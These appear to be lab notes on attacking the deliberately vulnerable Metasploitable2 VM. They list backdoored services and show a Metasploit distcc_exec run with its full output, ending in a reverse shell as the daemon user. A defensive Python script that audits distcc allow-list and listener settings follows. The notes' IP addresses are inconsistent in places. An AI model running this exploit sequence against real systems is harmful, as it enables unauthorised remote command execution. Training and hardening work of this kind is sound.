Kali: 192.168.0.20/24
MSFable: 192.168.0.51/24
Vulnerable services:
- samba -> usermap_script
- irc -> unreal_ircd_3281_backdoor
- ftp -> vsftpd_234_backdoor

Services: Unintentional Backdoors
In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of these installed on Metasploitable2 is distccd, a program that makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.
msfconsole
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set RHOST 192.168.99.131
msf exploit(distcc_exec) > exploit

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(distcc_exec) > set rhost 192.168.0.51
rhost => 192.168.0.51
msf exploit(distcc_exec) > exploit
[*] Started reverse TCP double handler on 192.168.0.30:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8gFZ6i8kVEx29A4c;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8gFZ6i8kVEx29A4c\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.0.30:4444 -> 192.168.0.51:57642) at 2016-04-20 21:36:24 -0400

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
Check out here:
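
The session above succeeds because distccd has no authentication of its own and relies on its client allow-list and listen address to decide who may submit jobs. As an added example (not part of the original notes or of distcc itself), the Python script below audits a Debian-style /etc/default/distcc for the settings that leave port 3632 open to any host. It assumes the variables STARTDISTCC, ALLOWEDNETS and LISTENER from that file; the two sample files and the /24 threshold are constructed for illustration.

```python
import ipaddress
import re

# Constructed samples of a Debian-style /etc/default/distcc (not from the page).
SAMPLE_EXPOSED = 'STARTDISTCC="true"\nALLOWEDNETS="0.0.0.0/0"\nLISTENER=""\n'
SAMPLE_RESTRICTED = (
    '# build farm node\n'
    'STARTDISTCC="true"\n'
    'ALLOWEDNETS="127.0.0.1 192.168.0.20/32"\n'
    'LISTENER="192.168.0.51"\n'
)

def parse_defaults(text):
    """Parse KEY="value" lines; comment and blank lines are skipped."""
    settings = {}
    for line in text.splitlines():
        m = re.match(r'\s*([A-Z_]+)=["\']?([^"\'#]*)["\']?', line)
        if m:
            settings[m.group(1)] = m.group(2).strip()
    return settings

def audit_distcc(text, min_prefix=24):
    """Return findings for settings that let arbitrary hosts submit jobs.

    min_prefix is an assumed policy threshold: any allowed network wider
    than /24 is reported.
    """
    cfg = parse_defaults(text)
    if cfg.get("STARTDISTCC", "false").lower() != "true":
        return []  # the init script does not start the daemon
    findings = []
    nets = cfg.get("ALLOWEDNETS", "").split()
    if not nets:
        findings.append("ALLOWEDNETS empty: no client allow-list")
    for net in nets:
        try:
            parsed = ipaddress.ip_network(net, strict=False)
        except ValueError:
            findings.append(f"ALLOWEDNETS entry not parseable: {net}")
            continue
        if parsed.prefixlen < min_prefix:
            findings.append(f"ALLOWEDNETS too broad: {net}")
    if cfg.get("LISTENER", "") in ("", "0.0.0.0", "::"):
        findings.append("LISTENER unset: daemon binds all interfaces")
    return findings

if __name__ == "__main__":
    for name, sample in (("exposed", SAMPLE_EXPOSED), ("restricted", SAMPLE_RESTRICTED)):
        print(name, audit_distcc(sample))
```

An empty result for a host that still answers on 3632 means the daemon is started some other way, so check the running distccd command line for its --allow and --listen options as well.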